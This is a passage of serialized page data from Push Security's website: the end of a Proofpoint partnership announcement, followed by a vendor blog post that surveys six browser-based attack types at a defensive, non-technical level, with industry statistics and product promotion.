",[],{},{"nodeType":695,"data":867,"content":868},{},[869],{"nodeType":699,"value":870,"marks":871,"data":872},"An analyst working in Proofpoint's platform can now follow a single attack end-to-end without stitching together data from disconnected tools and limited data sources, significantly reducing investigation and response times. ",[],{},{"nodeType":725,"data":874,"content":875},{},[876],{"nodeType":699,"value":877,"marks":878,"data":880},"What this means for Proofpoint customers",[879],{"type":707},{},{"nodeType":695,"data":882,"content":883},{},[884],{"nodeType":699,"value":885,"marks":886,"data":887},"Proofpoint customers get a first-class browser security integration that covers the attacks email security was never architecturally positioned to catch — and delivers that detection data back into the Proofpoint platform. When Push detects and stops an attack for one Proofpoint customer, the data feeds back into the Proofpoint platform to block it everywhere.",[],{},{"nodeType":695,"data":889,"content":890},{},[891],{"nodeType":699,"value":892,"marks":893,"data":894},"For the broader market, the signal here is hard to miss. When a company of Proofpoint's scale — one that has the highest level of visibility into email-based threats — concludes that browser security is a critical piece for threat protection, that's extreme validation for the secure enterprise browser market. Browser security isn't a niche add-on anymore. It's a non-negotiable.",[],{},{"nodeType":695,"data":896,"content":897},{},[898],{"nodeType":699,"value":899,"marks":900,"data":901},"Proofpoint Advanced Browser Protection will be generally available from early 2027. ",[],{},{"nodeType":721,"data":903,"content":904},{},[],{"nodeType":695,"data":906,"content":907},{},[908],{"nodeType":699,"value":909,"marks":910,"data":911},"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.",[],{},{"nodeType":695,"data":913,"content":914},{},[915],{"nodeType":699,"value":916,"marks":917,"data":918},"Security teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.",[],{},{"nodeType":695,"data":920,"content":921},{},[922,925,934],{"nodeType":699,"value":21,"marks":923,"data":924},[],{},{"nodeType":791,"data":926,"content":928},{"uri":927},"https:\u002F\u002Fpushsecurity.com\u002Fdemo",[929],{"nodeType":699,"value":930,"marks":931,"data":933},"Book a live demo to learn more.",[932],{"type":799},{},{"nodeType":699,"value":21,"marks":935,"data":936},[],{},{"entries":938},{"hyperlink":939,"block":940,"inline":941},[],[],[],"json",{"items":944},[],{},"Announcing the Proofpoint and Push Security partnership","company-news","2026-09-29T00:00:00.000Z",{"items":950},[951,1846,2342],{"__typename":952,"sys":953,"content":955,"title":1824,"synopsis":1825,"hashTags":60,"publishedDate":1826,"slug":1827,"tagsCollection":1828,"authorsCollection":1838},"BlogPosts",{"id":954},"62Zyr35VUmijkpupWk3hoD",{"json":956},{"nodeType":691,"data":957,"content":958},{},[959,976,983,986,994,1001,1008,1040,1049,1056,1063,1070,1073,1081,1088,1091,1099,1106,1112,1119,1125,1145,1152,1159,1166,1172,1175,1183,1190,1196,1227,1234,1250,1269,1276,1282,1285,1293,1312,1319,1342,1374,1410,1417,1423,1426,1434,1441,1447,1466,1473,1501,1532,1538,1541,1549,1556,1562,1581,1588,1638,1676,1683,1689,1692,1700,1707,1714,1740,1759,1765,1768,1776,1794,1800,1806],{"nodeType":695,"data":960,"content":961},{},[962,966,972],{"nodeType":699,"value":963,"marks":964,"data":965},"The view that \"the browser is the new endpoint\" and \"the new battleground for cyber attacks\" is becoming increasingly advocated by security leaders. But what does this ",[],{},{"nodeType":699,"value":967,"marks":968,"data":971},"actually",[969],{"type":970},"italic",{},{"nodeType":699,"value":973,"marks":974,"data":975}," mean for security teams? ",[],{},{"nodeType":695,"data":977,"content":978},{},[979],{"nodeType":699,"value":980,"marks":981,"data":982},"In this article, we’re cutting out the jargon to explore what a browser-based attack is, and what’s required for effective detection and response. ",[],{},{"nodeType":721,"data":984,"content":985},{},[],{"nodeType":725,"data":987,"content":988},{},[989],{"nodeType":699,"value":990,"marks":991,"data":993},"What is the goal of a browser-based attack?   ",[992],{"type":707},{},{"nodeType":695,"data":995,"content":996},{},[997],{"nodeType":699,"value":998,"marks":999,"data":1000},"First, it’s important to establish what the point of a browser-based attack is.",[],{},{"nodeType":695,"data":1002,"content":1003},{},[1004],{"nodeType":699,"value":1005,"marks":1006,"data":1007},"In most scenarios, attackers don’t think of themselves as attacking your web browser. Their end-goal is to compromise your business apps and data. That means going after the third-party apps and services that are now the backbone of business IT — and therefore the top target for attackers. ",[],{},{"nodeType":695,"data":1009,"content":1010},{},[1011,1015,1024,1028,1036],{"nodeType":699,"value":1012,"marks":1013,"data":1014},"The most common attack path today sees attackers log into third-party services, dump the data, and monetize it through extortion. You need only look at last year’s ",[],{},{"nodeType":791,"data":1016,"content":1018},{"uri":1017},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fsnowflake-retro",[1019],{"nodeType":699,"value":1020,"marks":1021,"data":1023},"Snowflake",[1022],{"type":799},{},{"nodeType":699,"value":1025,"marks":1026,"data":1027}," customer breaches that impacted 165+ organizations, or the still-ongoing ",[],{},{"nodeType":791,"data":1029,"content":1031},{"uri":1030},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fanalyzing-the-instructure-breach",[1032],{"nodeType":699,"value":1033,"marks":1034,"data":1035},"Salesforce attacks",[],{},{"nodeType":699,"value":1037,"marks":1038,"data":1039}," to see the scale of the problem. Identity weaknesses played a material role in almost 90% of Unit 42's investigations, and Google\u002FMandiant reported that identity issues were the initial access vector in 83% of cloud-related incidents.",[],{},{"nodeType":1041,"data":1042,"content":1048},"embedded-entry-block",{"target":1043},{"sys":1044},{"id":1045,"type":1046,"linkType":1047},"5agrVXzEdwALmew2F5SPDp","Link","Entry",[],{"nodeType":695,"data":1050,"content":1051},{},[1052],{"nodeType":699,"value":1053,"marks":1054,"data":1055},"The most logical way to do this is by targeting users of those apps. And because of the changes to working practices, your users are more accessible than ever to external attackers.",[],{},{"nodeType":695,"data":1057,"content":1058},{},[1059],{"nodeType":699,"value":1060,"marks":1061,"data":1062},"Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content (at least, without significantly impeding their ability to do their jobs).",[],{},{"nodeType":695,"data":1064,"content":1065},{},[1066],{"nodeType":699,"value":1067,"marks":1068,"data":1069},"Given that the browser is the place where business apps are accessed and used, it makes sense that attacks are increasingly playing out there too. ",[],{},{"nodeType":721,"data":1071,"content":1072},{},[],{"nodeType":725,"data":1074,"content":1075},{},[1076],{"nodeType":699,"value":1077,"marks":1078,"data":1080},"The 6 key browser-based attacks that security teams need to know about",[1079],{"type":707},{},{"nodeType":695,"data":1082,"content":1083},{},[1084],{"nodeType":699,"value":1085,"marks":1086,"data":1087},"Here's our breakdown of the top 6 browser-based attacks that should be on every security team's radar right now. Check out the videos for 101 explainers!",[],{},{"nodeType":721,"data":1089,"content":1090},{},[],{"nodeType":769,"data":1092,"content":1093},{},[1094],{"nodeType":699,"value":1095,"marks":1096,"data":1098},"1. Phishing for credentials and sessions",[1097],{"type":707},{},{"nodeType":695,"data":1100,"content":1101},{},[1102],{"nodeType":699,"value":1103,"marks":1104,"data":1105},"The most direct way for an attacker to compromise a business application is to phish a user of that app. You might not necessarily think of phishing as a browser-based attack, but that’s exactly what it is today. ",[],{},{"nodeType":1041,"data":1107,"content":1111},{"target":1108},{"sys":1109},{"id":1110,"type":1046,"linkType":1047},"6wn81JTcqktmJSSFfTzNSc",[],{"nodeType":695,"data":1113,"content":1114},{},[1115],{"nodeType":699,"value":1116,"marks":1117,"data":1118},"Phishing tooling and infrastructure has evolved a lot in the past decade, while the changes to business IT means there are both many more vectors for phishing attack delivery, and apps and identities to target. Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration. ",[],{},{"nodeType":1041,"data":1120,"content":1124},{"target":1121},{"sys":1122},{"id":1123,"type":1046,"linkType":1047},"3SrKOgpedLMQRpKIZqUQur",[],{"nodeType":695,"data":1126,"content":1127},{},[1128,1132,1141],{"nodeType":699,"value":1129,"marks":1130,"data":1131},"Whereas phishing was once entirely focused on credential theft, modern phishing attacks see the attacker intercept the victim’s session on the target app, using reverse-proxy Attacker-in-the-Middle kits that are the standard choice for attackers today. This means most forms of MFA can be bypassed, with the exception of passkeys (though attackers are finding ways to work around passkeys using ",[],{},{"nodeType":791,"data":1133,"content":1135},{"uri":1134},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fmfa-downgrade-attacks\u002F",[1136],{"nodeType":699,"value":1137,"marks":1138,"data":1140},"downgrade attacks",[1139],{"type":799},{},{"nodeType":699,"value":1142,"marks":1143,"data":1144},"). ",[],{},{"nodeType":695,"data":1146,"content":1147},{},[1148],{"nodeType":699,"value":1149,"marks":1150,"data":1151},"There are other key differences to be aware of too. Today, phishing operates on an industrial scale, using an array of obfuscation and detection evasion techniques. The latest generation of fully customized AitM phishing kits are dynamically obfuscating the code that loads the web page, implementing custom bot protection (e.g. CAPTCHA or Cloudflare Turnstile), using runtime anti-analysis features, and using legitimate SaaS and cloud services to host and deliver phishing links to cover their tracks.",[],{},{"nodeType":695,"data":1153,"content":1154},{},[1155],{"nodeType":699,"value":1156,"marks":1157,"data":1158},"This means that traditional anti-phishing tools at the email and network layer are struggling to keep up, with many attacks evading email-based detections (or bypassing email altogether). At the same time, proxy-based solutions now see a garbled mess of JavaScript code without the necessary context of what is actually happening in the browser to be able to piece it together effectively. Even if they don’t realize it, this means many organizations are now relying solely on blocking known-bad sites and hosts — a wildly ineffective solution with the rate that attackers refresh and rotate their phishing infrastructure. ",[],{},{"nodeType":695,"data":1160,"content":1161},{},[1162],{"nodeType":699,"value":1163,"marks":1164,"data":1165},"These changes make phishing more effective than ever, and increasingly difficult to detect and block without being able to observe and analyze web pages that a user interacts with in real time — something only possible with browser-level visibility. ",[],{},{"nodeType":1041,"data":1167,"content":1171},{"target":1168},{"sys":1169},{"id":1170,"type":1046,"linkType":1047},"NHu0Q6ac9mLOPPMoswB8B",[],{"nodeType":721,"data":1173,"content":1174},{},[],{"nodeType":769,"data":1176,"content":1177},{},[1178],{"nodeType":699,"value":1179,"marks":1180,"data":1182},"2. Malicious copy and paste (aka. ClickFix, FileFix, etc.)",[1181],{"type":707},{},{"nodeType":695,"data":1184,"content":1185},{},[1186],{"nodeType":699,"value":1187,"marks":1188,"data":1189},"Since late 2024, attackers have been tricking users into performing malicious actions under the pretext of \"fixing\" an issue for a webpage to load. The most common scenarios relate to \"verifying that you are human,\" styled as a version of the bot protection challenges we're all used to encountering on the internet today. ",[],{},{"nodeType":1041,"data":1191,"content":1195},{"target":1192},{"sys":1193},{"id":1194,"type":1046,"linkType":1047},"4Tp6KL7yz8CdxdKu5ieWMt",[],{"nodeType":695,"data":1197,"content":1198},{},[1199,1203,1211,1215,1223],{"nodeType":699,"value":1200,"marks":1201,"data":1202},"Microsoft's Digital Defense Report identified ClickFix as the ",[],{},{"nodeType":791,"data":1204,"content":1206},{"uri":1205},"https:\u002F\u002Fcdn-dynmedia-1.microsoft.com\u002Fis\u002Fcontent\u002Fmicrosoftcorp\u002Fmicrosoft\u002Fmsc\u002Fdocuments\u002Fpresentations\u002FCSR\u002FMicrosoft-Digital-Defense-Report-2025.pdf",[1207],{"nodeType":699,"value":1208,"marks":1209,"data":1210},"most common initial access vector, accounting for 47% of observed attacks",[],{},{"nodeType":699,"value":1212,"marks":1213,"data":1214},". CrowdStrike recorded a ",[],{},{"nodeType":791,"data":1216,"content":1218},{"uri":1217},"https:\u002F\u002Fwww.crowdstrike.com\u002Fexplore\u002F2026-global-threat-report",[1219],{"nodeType":699,"value":1220,"marks":1221,"data":1222},"563% increase in fake CAPTCHA ClickFix lures",[],{},{"nodeType":699,"value":1224,"marks":1225,"data":1226},". Push's own detection data tells a similar story: ClickFix made up an average of 52% of detections through Q2 2026, surpassing all other browser-based attack categories for the first time.",[],{},{"nodeType":695,"data":1228,"content":1229},{},[1230],{"nodeType":699,"value":1231,"marks":1232,"data":1233},"Traditional ClickFix-style attacks are a hybrid of browser and endpoint targeting. While delivered via the browser, the user copies and runs malicious scripts on their endpoint, targeting a wide range of legitimate, pre-installed system tools that allow commands to be run (Living Off the Land Binaries, or LOLBins). This results in the user installing malicious software on their machine — typically Remote Access Tools (RATs) and infostealer malware.",[],{},{"nodeType":695,"data":1235,"content":1236},{},[1237,1241,1246],{"nodeType":699,"value":1238,"marks":1239,"data":1240},"Notably, ClickFix remains a trap that users fall into rather than something they're targeted with directly. ",[],{},{"nodeType":699,"value":1242,"marks":1243,"data":1245},"4 in 5 ClickFix payloads intercepted by Push are accessed from search engines",[1244],{"type":707},{},{"nodeType":699,"value":1247,"marks":1248,"data":1249}," — the result of compromised sites, malvertising, and SEO poisoning. This naturally means they completely bypass email-based security controls. ",[],{},{"nodeType":695,"data":1251,"content":1252},{},[1253,1257,1265],{"nodeType":699,"value":1254,"marks":1255,"data":1256},"ClickFix continues to spawn new tools and sub-techniques. ClickFix-as-a-Service platforms are achieving 60% victim conversion rates. Payloads are highly variable, with Push capturing 84 distinct command forms targeting 16+ different system binaries. EtherHiding — storing kit configuration on public blockchains — means there's no host to take down and no domain to block. Attackers are also using shared conversations on AI chatbot platforms like ",[],{},{"nodeType":791,"data":1258,"content":1260},{"uri":1259},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fllmshare-malvertising-campaign\u002F",[1261],{"nodeType":699,"value":1262,"marks":1263,"data":1264},"ChatGPT and Claude to deliver malware",[],{},{"nodeType":699,"value":1266,"marks":1267,"data":1268}," via pages hosted on trusted, legitimate domains.",[],{},{"nodeType":695,"data":1270,"content":1271},{},[1272],{"nodeType":699,"value":1273,"marks":1274,"data":1275},"These varied delivery mechanisms and payloads make ClickFix tricky for traditional security tools to detect in real time. However, every ClickFix attack and variant happens in the browser with a malicious copy and paste event, which is where browser-based tools like Push have a great opportunity to intercept them.",[],{},{"nodeType":1041,"data":1277,"content":1281},{"target":1278},{"sys":1279},{"id":1280,"type":1046,"linkType":1047},"29Y7nRr39TiUyvAwinYctG",[],{"nodeType":721,"data":1283,"content":1284},{},[],{"nodeType":769,"data":1286,"content":1287},{},[1288],{"nodeType":699,"value":1289,"marks":1290,"data":1292},"3. Authorization phishing",[1291],{"type":707},{},{"nodeType":695,"data":1294,"content":1295},{},[1296,1300,1308],{"nodeType":699,"value":1297,"marks":1298,"data":1299},"While AiTM phishing targets the login — the moment a user proves their identity — a growing class of attacks targets what happens after the login. Instead of stealing a session from the authentication flow, ",[],{},{"nodeType":791,"data":1301,"content":1303},{"uri":1302},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fauthorization-phishing",[1304],{"nodeType":699,"value":1305,"marks":1306,"data":1307},"authorization phishing",[],{},{"nodeType":699,"value":1309,"marks":1310,"data":1311}," abuses OAuth authorization mechanisms — consent grants, device code flows, and token exchanges — to obtain access tokens. The attacker never touches the authentication flow at all, which means every form of MFA, including phishing-resistant passkeys, is irrelevant.",[],{},{"nodeType":695,"data":1313,"content":1314},{},[1315],{"nodeType":699,"value":1316,"marks":1317,"data":1318},"Three techniques currently fall under the authorization phishing umbrella:",[],{},{"nodeType":695,"data":1320,"content":1321},{},[1322,1326,1330,1338],{"nodeType":699,"value":265,"marks":1323,"data":1325},[1324],{"type":707},{},{"nodeType":699,"value":1327,"marks":1328,"data":1329}," sees the victim authorize a third-party app via an OAuth consent grant. This can be an app the attacker has created, or a legitimate SaaS app tenant — you can simply sign up for an account and ",[],{},{"nodeType":791,"data":1331,"content":1333},{"uri":1332},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fopenai-poisoned-tenant-attack",[1334],{"nodeType":699,"value":1335,"marks":1336,"data":1337},"invite targets to your app tenant",[],{},{"nodeType":699,"value":1339,"marks":1340,"data":1341},". Identity providers have substantially hardened their defaults against consent phishing (Microsoft now blocks unverified third-party app consent by default, for example), which is why attackers have increasingly shifted to the next two techniques.",[],{},{"nodeType":695,"data":1343,"content":1344},{},[1345,1349,1353,1361,1365,1370],{"nodeType":699,"value":260,"marks":1346,"data":1348},[1347],{"type":707},{},{"nodeType":699,"value":1350,"marks":1351,"data":1352}," targets a different OAuth flow entirely: the RFC 8628 device authorization grant, originally designed for input-constrained devices like smart TVs. The attacker generates a code, delivers it to the victim via a phishing page, and the victim enters the code on the real identity provider's device login page. Push has tracked a ",[],{},{"nodeType":791,"data":1354,"content":1356},{"uri":1355},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fdevice-code-phishing",[1357],{"nodeType":699,"value":1358,"marks":1359,"data":1360},"37.5x increase in device code phishing attacks",[],{},{"nodeType":699,"value":1362,"marks":1363,"data":1364}," in 2026, with ",[],{},{"nodeType":699,"value":1366,"marks":1367,"data":1369},"30+ distinct kits",[1368],{"type":707},{},{"nodeType":699,"value":1371,"marks":1372,"data":1373}," now offering the technique. Because device code phishing targets apps already consented in the user's tenant (usually first-party Microsoft apps), it sidesteps the consent restrictions that shut down traditional consent phishing.",[],{},{"nodeType":695,"data":1375,"content":1376},{},[1377,1382,1386,1394,1398,1406],{"nodeType":699,"value":1378,"marks":1379,"data":1381},"ConsentFix",[1380],{"type":707},{},{"nodeType":699,"value":1383,"marks":1384,"data":1385}," occupies a middle ground — a ClickFix-OAuth hybrid that targets the standard authorization code grant flow rather than the device code flow. ",[],{},{"nodeType":791,"data":1387,"content":1389},{"uri":1388},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix\u002F",[1390],{"nodeType":699,"value":1391,"marks":1392,"data":1393},"First observed in Russian APT29 campaigns",[],{},{"nodeType":699,"value":1395,"marks":1396,"data":1397},", it has since been ",[],{},{"nodeType":791,"data":1399,"content":1401},{"uri":1400},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix-v3-analyzing-a-new-toolkit\u002F",[1402],{"nodeType":699,"value":1403,"marks":1404,"data":1405},"commoditized into criminal tooling",[],{},{"nodeType":699,"value":1407,"marks":1408,"data":1409},".",[],{},{"nodeType":695,"data":1411,"content":1412},{},[1413],{"nodeType":699,"value":1414,"marks":1415,"data":1416},"Preventing malicious OAuth grants requires tight in-app management of user permissions and tenant security settings across every app in the estate. Conditional access policies help, but their effectiveness varies significantly by technique — \"require compliant device\" blocks device code phishing but not ConsentFix, while \"block device code flow\" breaks legitimate use cases like Azure CLI and conference room hardware. Browser-based security tools are well positioned to observe OAuth grants across all apps accessed in the browser — even the ones the security team doesn't manage or know about.",[],{},{"nodeType":1041,"data":1418,"content":1422},{"target":1419},{"sys":1420},{"id":1421,"type":1046,"linkType":1047},"1Fxgll8d4vVwtkGdwIAgkm",[],{"nodeType":721,"data":1424,"content":1425},{},[],{"nodeType":769,"data":1427,"content":1428},{},[1429],{"nodeType":699,"value":1430,"marks":1431,"data":1433},"4. Malicious browser extensions",[1432],{"type":707},{},{"nodeType":695,"data":1435,"content":1436},{},[1437],{"nodeType":699,"value":1438,"marks":1439,"data":1440},"Attackers use malicious extensions to steal data, log keystrokes, and intercept credentials and tokens as they transit the browser. ",[],{},{"nodeType":1041,"data":1442,"content":1446},{"target":1443},{"sys":1444},{"id":1445,"type":1046,"linkType":1047},"5fuigCAUuHxP49KjWgP8SO",[],{"nodeType":695,"data":1448,"content":1449},{},[1450,1454,1462],{"nodeType":699,"value":1451,"marks":1452,"data":1453},"Most malicious extensions didn't start that way — attackers begin with a legitimate extension and bide their time, waiting until install counts reach maximum impact before deploying a malicious update. It's ",[],{},{"nodeType":791,"data":1455,"content":1457},{"uri":1456},"https:\u002F\u002Fsecureannex.com\u002Fblog\u002Fbuying-browser-extensions\u002F",[1458],{"nodeType":699,"value":1459,"marks":1460,"data":1461},"very easy for attackers to buy and add malicious updates",[],{},{"nodeType":699,"value":1463,"marks":1464,"data":1465}," to existing extensions, easily passing extension web store security checks.",[],{},{"nodeType":695,"data":1467,"content":1468},{},[1469],{"nodeType":699,"value":1470,"marks":1471,"data":1472},"There are four common entry paths: phish the developer of a popular extension; offer to buy a widely-installed extension outright; vibe-code your own extension and market it to users; or upload a malicious version and let user browsers auto-update on next launch.",[],{},{"nodeType":695,"data":1474,"content":1475},{},[1476,1480,1485,1489,1497],{"nodeType":699,"value":1477,"marks":1478,"data":1479},"Permissions alone don't indicate risk, since nearly every extension has exploitable ones — ",[],{},{"nodeType":699,"value":1481,"marks":1482,"data":1484},"46.76% of extensions across Push customers have the permission combinations needed for account takeover with no user interaction",[1483],{"type":707},{},{"nodeType":699,"value":1486,"marks":1487,"data":1488},". The most dangerous let attackers intercept sensitive data, credentials, and session tokens in transit. Malicious extensions routinely evade static and sandbox analysis via dynamically compiled, smuggled code, letting them reach official stores and even earn \"Featured\" or \"Verified\" status. AI browser extensions add a further dimension: the ",[],{},{"nodeType":791,"data":1490,"content":1492},{"uri":1491},"https:\u002F\u002Fwww.verizon.com\u002Fbusiness\u002Fresources\u002Freports\u002Fdbir\u002F",[1493],{"nodeType":699,"value":1494,"marks":1495,"data":1496},"Verizon DBIR 2026",[],{},{"nodeType":699,"value":1498,"marks":1499,"data":1500}," found that more than 15% of corporate users had unauthorized AI browser extensions installed — extensions that collect and retain browsing context from internal sites, creating a data exfiltration pathway that operates independently of traditional DLP controls.",[],{},{"nodeType":695,"data":1502,"content":1503},{},[1504,1508,1516,1520,1528],{"nodeType":699,"value":1505,"marks":1506,"data":1507},"Generally, your employees should not be randomly installing browser extensions unless pre-approved by your security team. But the reality is that many organizations have very little visibility of the extensions their employees are using, and the potential risk they're exposed to as a result. Static risk scoring is a ",[],{},{"nodeType":791,"data":1509,"content":1511},{"uri":1510},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhy-browser-extension-risk-scoring-wont-predict-your-next-breach\u002F",[1512],{"nodeType":699,"value":1513,"marks":1514,"data":1515},"poor predictor of supply chain compromise",[],{},{"nodeType":699,"value":1517,"marks":1518,"data":1519}," — every major breach of the past 18 months involved extensions that scored as low-risk beforehand. A default-deny approach with ",[],{},{"nodeType":791,"data":1521,"content":1523},{"uri":1522},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fbrowser-extension-management-guide\u002F",[1524],{"nodeType":699,"value":1525,"marks":1526,"data":1527},"allowlisting plus monitoring for change events",[],{},{"nodeType":699,"value":1529,"marks":1530,"data":1531}," is more effective than risk-score-based removal.",[],{},{"nodeType":1041,"data":1533,"content":1537},{"target":1534},{"sys":1535},{"id":1536,"type":1046,"linkType":1047},"6WRUfE4LepAQ35hRz2UlH1",[],{"nodeType":721,"data":1539,"content":1540},{},[],{"nodeType":769,"data":1542,"content":1543},{},[1544],{"nodeType":699,"value":1545,"marks":1546,"data":1548},"5. Credential stuffing and ghost logins",[1547],{"type":707},{},{"nodeType":695,"data":1550,"content":1551},{},[1552],{"nodeType":699,"value":1553,"marks":1554,"data":1555},"Password-based compromise remains one of the leading causes of breaches. This might surprise you if you think that SSO solved credential attacks. ",[],{},{"nodeType":1041,"data":1557,"content":1561},{"target":1558},{"sys":1559},{"id":1560,"type":1046,"linkType":1047},"5RJyr7JbVhUnccMIMsGtnE",[],{"nodeType":695,"data":1563,"content":1564},{},[1565,1569,1577],{"nodeType":699,"value":1566,"marks":1567,"data":1568},"But SSO isn't universal — SAML often costs extra, requires admin setup, and self-adopted apps rarely get configured, while most apps allow simultaneous login methods and don't restrict login methods. The result is ",[],{},{"nodeType":791,"data":1570,"content":1572},{"uri":1571},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fhow-many-vulnerable-identities-do-you-have\u002F",[1573],{"nodeType":699,"value":1574,"marks":1575,"data":1576},"ghost logins",[],{},{"nodeType":699,"value":1578,"marks":1579,"data":1580},": backup credentials outside SSO, invisible to IdP logs, created at adoption and still active unless disabled — gaps that stay hidden since most orgs focus MFA at the IdP layer, not on local app config, until an attacker finds them.",[],{},{"nodeType":695,"data":1582,"content":1583},{},[1584],{"nodeType":699,"value":1585,"marks":1586,"data":1587},"The data supports this. Of the last million logins observed by Push:",[],{},{"nodeType":1589,"data":1590,"content":1591},"unordered-list",{},[1592,1608,1623],{"nodeType":1593,"data":1594,"content":1595},"list-item",{},[1596],{"nodeType":695,"data":1597,"content":1598},{},[1599,1604],{"nodeType":699,"value":1600,"marks":1601,"data":1603},"1 in 4",[1602],{"type":707},{},{"nodeType":699,"value":1605,"marks":1606,"data":1607}," were password logins, not SSO",[],{},{"nodeType":1593,"data":1609,"content":1610},{},[1611],{"nodeType":695,"data":1612,"content":1613},{},[1614,1619],{"nodeType":699,"value":1615,"marks":1616,"data":1618},"2 in 5",[1617],{"type":707},{},{"nodeType":699,"value":1620,"marks":1621,"data":1622}," were not protected by MFA",[],{},{"nodeType":1593,"data":1624,"content":1625},{},[1626],{"nodeType":695,"data":1627,"content":1628},{},[1629,1634],{"nodeType":699,"value":1630,"marks":1631,"data":1633},"1 in 5",[1632],{"type":707},{},{"nodeType":699,"value":1635,"marks":1636,"data":1637}," used a weak, breached, or reused password",[],{},{"nodeType":695,"data":1639,"content":1640},{},[1641,1645,1653,1657,1662,1666,1672],{"nodeType":699,"value":1642,"marks":1643,"data":1644},"And the external sources also paint this picture. ",[],{},{"nodeType":791,"data":1646,"content":1648},{"uri":1647},"https:\u002F\u002Fcf-assets.www.cloudflare.com\u002Fslt3lc6tev37\u002FsWDBUMNVtEJB9ZFLt1dUU\u002F8d69e92de2edfb3bf59e7d21d57e7e1a\u002FCloudflare-2026-threat-report.pdf",[1649],{"nodeType":699,"value":1650,"marks":1651,"data":1652},"Cloudflare's 2026 Threat Report",[],{},{"nodeType":699,"value":1654,"marks":1655,"data":1656}," found that ",[],{},{"nodeType":699,"value":1658,"marks":1659,"data":1661},"63% of all human logins involve credentials already compromised elsewhere",[1660],{"type":707},{},{"nodeType":699,"value":1663,"marks":1664,"data":1665},". And the ",[],{},{"nodeType":791,"data":1667,"content":1668},{"uri":1491},[1669],{"nodeType":699,"value":1494,"marks":1670,"data":1671},[],{},{"nodeType":699,"value":1673,"marks":1674,"data":1675}," found that 50% of ransomware victims had a credential or infostealer event within 95 days prior to the attack, with infostealers surfacing an average of 2,362 breached corporate credentials per month from organizational email domains.",[],{},{"nodeType":695,"data":1677,"content":1678},{},[1679],{"nodeType":699,"value":1680,"marks":1681,"data":1682},"Logins can be observed in the browser — in fact, it's as close to a universal source of truth as you're going to get about how your employees are actually logging in, which apps they're using, and whether MFA is present, enabling security teams to find and fix vulnerable logins before they can be exploited.",[],{},{"nodeType":1041,"data":1684,"content":1688},{"target":1685},{"sys":1686},{"id":1687,"type":1046,"linkType":1047},"1tX9gSZ51VEmXjRliTXuPV",[],{"nodeType":721,"data":1690,"content":1691},{},[],{"nodeType":769,"data":1693,"content":1694},{},[1695],{"nodeType":699,"value":1696,"marks":1697,"data":1699},"6. Session hijacking",[1698],{"type":707},{},{"nodeType":695,"data":1701,"content":1702},{},[1703],{"nodeType":699,"value":1704,"marks":1705,"data":1706},"Session hijacking (aka token replay) allows attackers to bypass the authentication process by taking an already-approved session token that they've stolen from the victim's device or browser, and reusing it in their own browser. This enables them to get around even phishing-resistant authentication controls like passkeys.",[],{},{"nodeType":695,"data":1708,"content":1709},{},[1710],{"nodeType":699,"value":1711,"marks":1712,"data":1713},"This is different to AiTM attacks, which see a new session created via the attacker's reverse-proxy connection to the target app. Sessions can be stolen using a variety of methods, some of which we've already discussed. Malicious browser extensions can extract them from webpages visited by the user, for example. But the most prominent source of stolen tokens is infostealer malware — also the leading source of stolen credentials powering credential stuffing attacks.",[],{},{"nodeType":695,"data":1715,"content":1716},{},[1717,1721,1728,1731,1736],{"nodeType":699,"value":1718,"marks":1719,"data":1720},"As mentioned previously, ClickFix is now the go-to method for delivering malware like infostealers. ClickFix is more detection-resistant than a normal file download, which is more likely to be intercepted and analyzed by controls like a web sandbox before hitting the endpoint and more likely to trigger endpoint alarms during execution. The problem extends beyond managed corporate machines, too: the ",[],{},{"nodeType":791,"data":1722,"content":1723},{"uri":1491},[1724],{"nodeType":699,"value":1725,"marks":1726,"data":1727},"Verizon DBIR 2025",[],{},{"nodeType":699,"value":1654,"marks":1729,"data":1730},[],{},{"nodeType":699,"value":1732,"marks":1733,"data":1735},"46% of infostealer infections that lead to corporate breaches originate on non-managed devices",[1734],{"type":707},{},{"nodeType":699,"value":1737,"marks":1738,"data":1739}," — personal machines, developer workstations, and contractor laptops where EDR is absent.",[],{},{"nodeType":695,"data":1741,"content":1742},{},[1743,1747,1755],{"nodeType":699,"value":1744,"marks":1745,"data":1746},"There's also a less obvious path for session theft. ",[],{},{"nodeType":791,"data":1748,"content":1750},{"uri":1749},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fbrowser-sync-attacks-where-personal-account-hacks-lead-to-corporate-breaches\u002F",[1751],{"nodeType":699,"value":1752,"marks":1753,"data":1754},"Browser sync features",[],{},{"nodeType":699,"value":1756,"marks":1757,"data":1758}," create a bridge between personal and corporate credential stores, meaning personal account or device compromises can directly lead to corporate breaches — as demonstrated in the Okta incident below, where corporate credentials had been synced to an engineer's personal Google account via Chrome profile sync.",[],{},{"nodeType":1041,"data":1760,"content":1764},{"target":1761},{"sys":1762},{"id":1763,"type":1046,"linkType":1047},"51WVinSAV5wN7mVny7v9QC",[],{"nodeType":721,"data":1766,"content":1767},{},[],{"nodeType":725,"data":1769,"content":1770},{},[1771],{"nodeType":699,"value":1772,"marks":1773,"data":1775},"Conclusion",[1774],{"type":707},{},{"nodeType":695,"data":1777,"content":1778},{},[1779,1783,1790],{"nodeType":699,"value":1780,"marks":1781,"data":1782},"Attacks are increasingly 